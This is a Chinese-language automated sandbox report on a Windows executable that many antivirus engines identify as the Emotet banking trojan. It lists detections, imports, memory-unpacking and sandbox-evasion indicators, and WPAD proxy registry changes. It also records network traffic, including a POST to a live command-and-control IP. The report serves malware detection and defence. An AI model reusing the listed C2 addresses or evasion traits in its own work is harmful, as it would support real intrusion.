9.4
极危
57 个模型检测该样本为恶意!
重新分析
更多

1fc8e140ecead33c1f8e7efd40f3171b632f813af6259f4c6246c9fa59b5bc0b

6c156ee0feb8da7bc0e5ed3e2913fad1.exe

分析耗时

109s

最近分析

文件大小

344.0KB
静态报毒 动态报毒 100% 4E1+MPDF2CO AI SCORE=100 AIDETECTVM CONFIDENCE CRYPTERX DOWNLOADER34 ELDORADO EMOTET GENCIRC GENERICKDZ GENETIC HFZB HIGH CONFIDENCE HUCXWI KGFEL KRYPTIK MALWARE2 MALWARE@#MOSB54QL3N13 OBFUSE QRYOC0YXLYU R + TROJ R350346 SCORE SMD4 THJABBO TROJANBANKER TRUG UNSAFE 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Baidu 20190318 1.0.0.2
Avast Win32:CrypterX-gen [Trj] 20201115 20.10.5736.0
Alibaba Trojan:Win32/Emotet.bdec8a28 20190527 0.3.0.5
Kingsoft 20201115 2013.8.14.323
McAfee Emotet-FSD!6C156EE0FEB8 20201115 6.0.6.653
Tencent Malware.Win32.Gencirc.10cdfdc3 20201115 1.0.0.1
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1620762767.406875
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 个事件)
Time & API Arguments Status Return Repeated
1620762754.515875
CryptGenKey
crypto_handle: 0x0095e988
algorithm_identifier: 0x0000660e ()
provider_handle: 0x0095c2f8
flags: 1
key: f £…SkA=Îý-Äa¸ˆ†
success 1 0
1620762767.515875
CryptExportKey
crypto_handle: 0x0095e988
crypto_export_handle: 0x0095c948
buffer: f¤aǽ \ã»ÎOM †.–­(֚ Žøõj“àbl”5™Š“bL(ÁT9ò®.,éë4£ ÞNHÕvÀ˜ë$+«ú¶Ø[r+|û&e&ô ‚£øO¤öm(ó@ûj¶
blob_type: 1
flags: 64
success 1 0
1620762794.031875
CryptExportKey
crypto_handle: 0x0095e988
crypto_export_handle: 0x0095c948
buffer: f¤dÕà¢hµN”ð-ƒ¼Uhö±ëÒÄì–ݽ¶Bp½K¸tҊò<™È§|˾SÑÇ̲­Ôô»À]§‹µ$—¿˜órì 5¨§C ÎCxx!Œ¡~³œ<¢'š`
blob_type: 1
flags: 64
success 1 0
1620762798.062875
CryptExportKey
crypto_handle: 0x0095e988
crypto_export_handle: 0x0095c948
buffer: f¤*š4ˆÔ{)n—Ã?yî´øDîÍlŒíÑË$PëěÂlô»°qxU Í$ îË P6‹¸¥H==Å«$üŸ=·«^}_Þ,dT®ä¸‹¡ÚenJ‹Ñ²È&Ú ]Ø
blob_type: 1
flags: 64
success 1 0
1620762801.421875
CryptExportKey
crypto_handle: 0x0095e988
crypto_export_handle: 0x0095c948
buffer: f¤ 6áýÿëþ«‡Î–±4#ùõ$3óÏ;ð¨ù%Z¡ÓÃEéaÍO©Yê‚ÐÆXÀ‡·ãºÍŠ:îˆH+OZ´R‘ †u’‡Núc$ð½²ÄÿüšcË; ü
blob_type: 1
flags: 64
success 1 0
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name None
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:2268575458&cup2hreq=ae8f358a40e90271624678a69563078809ec1c400fe7f5f8cc4a6401ca9b407c
Performs some HTTP requests (5 个事件)
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620741632&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e910a3d51834f0c2&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620741632&mv=m&mvi=3
request GET http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e910a3d51834f0c2&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620741632&mv=m&mvi=3
request POST https://update.googleapis.com/service/update2?cup2key=10:2268575458&cup2hreq=ae8f358a40e90271624678a69563078809ec1c400fe7f5f8cc4a6401ca9b407c
Sends data using the HTTP POST Method (1 个事件)
request POST https://update.googleapis.com/service/update2?cup2key=10:2268575458&cup2hreq=ae8f358a40e90271624678a69563078809ec1c400fe7f5f8cc4a6401ca9b407c
Allocates read-write-execute memory (usually to unpack itself) (1 个事件)
Time & API Arguments Status Return Repeated
1620762753.499875
NtAllocateVirtualMemory
process_identifier: 624
region_size: 45056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00960000
success 0 0
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (7 个事件)
Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 个事件)
Time & API Arguments Status Return Repeated
1620762753.515875
NtProtectVirtualMemory
process_identifier: 624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 28672
protection: 32 (PAGE_EXECUTE_READ)
process_handle: 0xffffffff
base_address: 0x00981000
success 0 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1620762768.140875
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 7.016649021766093 section {'size_of_data': '0x00011000', 'virtual_address': '0x00049000', 'entropy': 7.016649021766093, 'name': '.rsrc', 'virtual_size': '0x000101e8'} description A section with a high entropy has been found
Expresses interest in specific running processes (1 个事件)
process 6c156ee0feb8da7bc0e5ed3e2913fad1.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1620762767.796875
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (6 个事件)
host 142.44.137.67
host 162.241.242.173
host 172.217.24.14
host 192.158.216.73
host 85.214.28.226
host 203.208.40.34
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1620762770.781875
RegSetValueExA
key_handle: 0x000003c8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1620762770.781875
RegSetValueExA
key_handle: 0x000003c8
value: ±O½F×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1620762770.796875
RegSetValueExA
key_handle: 0x000003c8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1620762770.796875
RegSetValueExW
key_handle: 0x000003c8
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1620762770.796875
RegSetValueExA
key_handle: 0x000003e0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1620762770.796875
RegSetValueExA
key_handle: 0x000003e0
value: ±O½F×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1620762770.796875
RegSetValueExA
key_handle: 0x000003e0
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1620762770.796875
RegSetValueExW
key_handle: 0x000003c4
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Generates some ICMP traffic
File has been identified by 57 AntiVirus engines on VirusTotal as malicious (50 out of 57 个事件)
Bkav W32.AIDetectVM.malware2
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.69926
FireEye Generic.mg.6c156ee0feb8da7b
ALYac Trojan.Agent.Emotet
Cylance Unsafe
Zillya Trojan.Emotet.Win32.28389
Sangfor Malware
K7AntiVirus Trojan ( 0056de091 )
BitDefender Trojan.GenericKDZ.69926
K7GW Trojan ( 0056de091 )
TrendMicro TrojanSpy.Win32.EMOTET.THJABBO
Cyren W32/Kryptik.BWJ.gen!Eldorado
Symantec Packed.Generic.554
TrendMicro-HouseCall TrojanSpy.Win32.EMOTET.SMD4.hp
Avast Win32:CrypterX-gen [Trj]
ClamAV Win.Malware.Emotet-9753021-0
Kaspersky HEUR:Trojan-Banker.Win32.Emotet.vho
Alibaba Trojan:Win32/Emotet.bdec8a28
NANO-Antivirus Trojan.Win32.Emotet.hucxwi
AegisLab Trojan.Win32.Emotet.trug
Rising Downloader.Obfuse!8.105AD (TFE:6:qryoc0yxlYU)
Ad-Aware Trojan.GenericKDZ.69926
Sophos Troj/Emotet-CLZ
Comodo Malware@#mosb54ql3n13
F-Secure Trojan.TR/Crypt.Agent.kgfel
DrWeb Trojan.DownLoader34.32723
VIPRE Trojan.Win32.Generic!BT
Invincea Mal/Generic-R + Troj/Emotet-CLZ
McAfee-GW-Edition BehavesLike.Win32.Emotet.fh
Emsisoft Trojan.Emotet (A)
APEX Malicious
Jiangmin Trojan.Banker.Emotet.oif
Avira TR/Crypt.Agent.kgfel
MAX malware (ai score=100)
Antiy-AVL Trojan[Banker]/Win32.Emotet
Microsoft Trojan:Win32/Emotet.ARK!MTB
Gridinsoft Trojan.Win32.Emotet.oa
Arcabit Trojan.Generic.D11126
ZoneAlarm HEUR:Trojan-Banker.Win32.Emotet.vho
GData Trojan.GenericKDZ.69926
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.Emotet.R350346
McAfee Emotet-FSD!6C156EE0FEB8
TACHYON Banker/W32.Emotet.352256.H
VBA32 TrojanBanker.Emotet
Malwarebytes Trojan.Agent
Ikarus Trojan-Banker.Emotet
Panda Trj/Genetic.gen
ESET-NOD32 a variant of Win32/Kryptik.HFZB
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (6 个事件)
dead_host 192.158.216.73:80
dead_host 172.217.24.14:443
dead_host 162.241.242.173:8080
dead_host 85.214.28.226:8080
dead_host 172.217.160.78:443
dead_host 192.168.56.101:49185
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-09-05 01:07:32

Imports

Library KERNEL32.dll:
0x4340b4 GetFileTime
0x4340b8 GetTickCount
0x4340bc HeapFree
0x4340c0 RtlUnwind
0x4340c4 VirtualProtect
0x4340c8 VirtualAlloc
0x4340cc GetSystemInfo
0x4340d0 VirtualQuery
0x4340d4 HeapAlloc
0x4340d8 HeapReAlloc
0x4340dc GetCommandLineA
0x4340e0 GetProcessHeap
0x4340e4 GetStartupInfoA
0x4340e8 RaiseException
0x4340ec ExitProcess
0x4340f0 HeapSize
0x4340f4 HeapDestroy
0x4340f8 HeapCreate
0x4340fc VirtualFree
0x434100 TerminateProcess
0x43410c IsDebuggerPresent
0x434110 GetACP
0x434114 LCMapStringA
0x434118 GetFileAttributesA
0x43411c GetStdHandle
0x434120 Sleep
0x434134 SetHandleCount
0x434138 GetFileType
0x434144 GetStringTypeA
0x434148 GetStringTypeW
0x434150 GetConsoleCP
0x434154 GetConsoleMode
0x434158 SetStdHandle
0x43415c WriteConsoleA
0x434160 GetConsoleOutputCP
0x434164 WriteConsoleW
0x434170 SetErrorMode
0x434178 GetOEMCP
0x43417c GetCPInfo
0x434180 CreateFileA
0x434184 GetFullPathNameA
0x43418c FindFirstFileA
0x434190 FindClose
0x434194 GetCurrentProcess
0x434198 DuplicateHandle
0x43419c GetThreadLocale
0x4341a0 GetFileSize
0x4341a4 SetEndOfFile
0x4341a8 UnlockFile
0x4341ac LockFile
0x4341b0 FlushFileBuffers
0x4341b4 SetFilePointer
0x4341b8 WriteFile
0x4341bc ReadFile
0x4341c0 GlobalFlags
0x4341c4 TlsFree
0x4341cc LocalReAlloc
0x4341d0 TlsSetValue
0x4341d4 TlsAlloc
0x4341dc GlobalHandle
0x4341e0 GlobalReAlloc
0x4341e8 TlsGetValue
0x4341f0 LocalAlloc
0x4341fc GetModuleFileNameW
0x434200 GlobalGetAtomNameA
0x434204 GlobalFindAtomA
0x434208 lstrcmpW
0x43420c GetVersionExA
0x434214 FreeResource
0x434218 GetCurrentProcessId
0x43421c GlobalAddAtomA
0x434220 CloseHandle
0x434224 GetCurrentThread
0x434228 GetCurrentThreadId
0x434230 GetModuleFileNameA
0x434238 GetLocaleInfoA
0x43423c LoadLibraryA
0x434240 lstrcmpA
0x434244 FreeLibrary
0x434248 GlobalDeleteAtom
0x43424c GetModuleHandleA
0x434250 SetLastError
0x434254 GlobalFree
0x434258 GlobalAlloc
0x43425c GlobalLock
0x434260 GlobalUnlock
0x434264 FormatMessageA
0x434268 LocalFree
0x43426c MulDiv
0x434270 LoadResource
0x434274 LockResource
0x434278 SizeofResource
0x43427c FindResourceA
0x434280 LoadLibraryW
0x434284 GetProcAddress
0x434288 GetLastError
0x43428c lstrlenA
0x434290 WideCharToMultiByte
0x434294 CompareStringA
0x434298 CompareStringW
0x43429c MultiByteToWideChar
0x4342a0 GetVersion
0x4342a4 LCMapStringW
0x4342a8 InterlockedExchange
Library USER32.dll:
0x4342fc UnregisterClassA
0x434304 PostThreadMessageA
0x434308 ReleaseCapture
0x43430c SetCapture
0x434310 LoadCursorA
0x434314 GetSysColorBrush
0x434318 EndPaint
0x43431c BeginPaint
0x434320 GetWindowDC
0x434324 ReleaseDC
0x434328 GetDC
0x43432c ClientToScreen
0x434330 GrayStringA
0x434334 DrawTextExA
0x434338 DrawTextA
0x43433c TabbedTextOutA
0x434340 DestroyMenu
0x434344 ShowWindow
0x434348 MoveWindow
0x43434c SetWindowTextA
0x434350 IsDialogMessageA
0x434358 SendDlgItemMessageA
0x43435c WinHelpA
0x434360 IsChild
0x434364 GetCapture
0x434368 GetClassLongA
0x43436c SetPropA
0x434370 GetPropA
0x434374 RemovePropA
0x434378 SetFocus
0x434380 GetWindowTextA
0x434384 MessageBeep
0x434388 GetTopWindow
0x43438c UnhookWindowsHookEx
0x434390 GetMessageTime
0x434394 GetMessagePos
0x434398 MapWindowPoints
0x43439c SetForegroundWindow
0x4343a0 UpdateWindow
0x4343a4 GetMenu
0x4343a8 CreateWindowExA
0x4343ac GetClassInfoExA
0x4343b0 GetClassInfoA
0x4343b4 RegisterClassA
0x4343b8 GetSysColor
0x4343bc AdjustWindowRectEx
0x4343c0 EqualRect
0x4343c4 CopyRect
0x4343c8 PtInRect
0x4343cc GetDlgCtrlID
0x4343d0 DefWindowProcA
0x4343d4 CallWindowProcA
0x4343d8 SetWindowLongA
0x4343dc OffsetRect
0x4343e0 IntersectRect
0x4343e8 GetWindowPlacement
0x4343ec GetWindowRect
0x4343f0 GetWindow
0x4343f8 MapDialogRect
0x4343fc SetWindowPos
0x434400 GetDesktopWindow
0x434404 CharUpperA
0x434408 EnableWindow
0x43440c LoadIconA
0x434410 SetActiveWindow
0x434418 DestroyWindow
0x43441c IsWindow
0x434420 GetDlgItem
0x434424 GetNextDlgTabItem
0x434428 EndDialog
0x434430 GetWindowLongA
0x434434 GetLastActivePopup
0x434438 IsWindowEnabled
0x43443c MessageBoxA
0x434440 GetNextDlgGroupItem
0x434444 InvalidateRgn
0x434448 InvalidateRect
0x43444c SetRect
0x434450 IsRectEmpty
0x434454 SetCursor
0x434458 SetWindowsHookExA
0x434460 CharNextA
0x434464 GetForegroundWindow
0x434468 SendMessageA
0x43446c AppendMenuA
0x434470 GetSystemMenu
0x434474 DrawIcon
0x434478 GetClientRect
0x43447c GetSystemMetrics
0x434480 IsIconic
0x434484 GetSubMenu
0x434488 GetMenuItemCount
0x43448c GetMenuItemID
0x434490 GetMenuState
0x434494 PostQuitMessage
0x434498 PostMessageA
0x43449c CheckMenuItem
0x4344a0 EnableMenuItem
0x4344a4 ModifyMenuA
0x4344a8 GetParent
0x4344ac GetFocus
0x4344b0 LoadBitmapA
0x4344b8 SetMenuItemBitmaps
0x4344bc ValidateRect
0x4344c0 GetCursorPos
0x4344c4 PeekMessageA
0x4344c8 GetKeyState
0x4344cc IsWindowVisible
0x4344d0 GetActiveWindow
0x4344d4 DispatchMessageA
0x4344d8 TranslateMessage
0x4344dc GetMessageA
0x4344e0 CallNextHookEx
0x4344e4 GetClassNameA
Library GDI32.dll:
0x434030 ScaleWindowExtEx
0x434034 ExtSelectClipRgn
0x434038 DeleteDC
0x43403c GetStockObject
0x434040 SetWindowExtEx
0x434044 GetBkColor
0x434048 GetTextColor
0x434050 GetRgnBox
0x434054 GetMapMode
0x434058 ScaleViewportExtEx
0x43405c SetViewportExtEx
0x434060 OffsetViewportOrgEx
0x434064 SetViewportOrgEx
0x434068 SelectObject
0x43406c Escape
0x434070 TextOutA
0x434074 RectVisible
0x434078 PtVisible
0x43407c GetDeviceCaps
0x434080 GetViewportExtEx
0x434084 DeleteObject
0x434088 SetMapMode
0x43408c RestoreDC
0x434090 SaveDC
0x434094 ExtTextOutA
0x434098 GetObjectA
0x43409c SetBkColor
0x4340a0 SetTextColor
0x4340a4 GetClipBox
0x4340a8 CreateBitmap
0x4340ac GetWindowExtEx
Library comdlg32.dll:
0x4344fc GetFileTitleA
Library WINSPOOL.DRV:
0x4344ec DocumentPropertiesA
0x4344f0 OpenPrinterA
0x4344f4 ClosePrinter
Library ADVAPI32.dll:
0x434000 RegOpenKeyExA
0x434004 RegQueryValueA
0x434008 RegEnumKeyA
0x43400c RegDeleteKeyA
0x434010 RegCloseKey
0x434014 RegOpenKeyA
0x434018 RegSetValueExA
0x43401c RegCreateKeyExA
0x434020 RegQueryValueExA
Library COMCTL32.dll:
0x434028
Library SHLWAPI.dll:
0x4342e8 PathFindFileNameA
0x4342ec PathStripToRootA
0x4342f0 PathFindExtensionA
0x4342f4 PathIsUNCA
Library oledlg.dll:
0x434544
Library ole32.dll:
0x434504 OleInitialize
0x43450c OleUninitialize
0x43451c CoGetClassObject
0x434520 CLSIDFromString
0x434524 CoRevokeClassObject
0x434528 CoTaskMemAlloc
0x43452c CoTaskMemFree
0x434534 OleFlushClipboard
0x43453c CLSIDFromProgID
Library OLEAUT32.dll:
0x4342b0 SysAllocStringLen
0x4342b4 VariantClear
0x4342b8 VariantChangeType
0x4342bc VariantInit
0x4342c0 SysStringLen
0x4342d4 SafeArrayDestroy
0x4342d8 SysAllocString
0x4342dc VariantCopy
0x4342e0 SysFreeString

Exports

Ordinal Address Name
1 0x401b20 UUACZDADWAJJJJJ

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49193 113.108.239.194 r1---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49194 113.108.239.196 r3---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49188 142.44.137.67 443
192.168.56.101 49192 203.208.41.65 redirector.gvt1.com 80
192.168.56.101 49191 203.208.41.66 update.googleapis.com 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 53500 114.114.114.114 53
192.168.56.101 56743 114.114.114.114 53
192.168.56.101 58070 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 60088 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60215 114.114.114.114 53
192.168.56.101 62191 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 50568 224.0.0.252 5355
192.168.56.101 53210 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 54991 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e910a3d51834f0c2&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620741632&mv=m&mvi=3 
GET /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e910a3d51834f0c2&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620741632&mv=m&mvi=3 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 13 Apr 2021 03:03:58 GMT
Range: bytes=0-6745
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com
http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620741632&mv=m&mvi=1&pl=23&shardbypass=yes 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620741632&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o7dn7e.gvt1.com
http://142.44.137.67:443/wMwDE51jS3NMu0/75o4t3s2Lp7H/vvQd8edpkl72pvVyI/ 
POST /wMwDE51jS3NMu0/75o4t3s2Lp7H/vvQd8edpkl72pvVyI/ HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------p8C4TK8uSCFZbDw8mh
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 142.44.137.67:443
Content-Length: 4532
Connection: Keep-Alive
Cache-Control: no-cache
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e910a3d51834f0c2&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620741632&mv=m&mvi=3 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=e910a3d51834f0c2&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620741632&mv=m&mvi=3 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.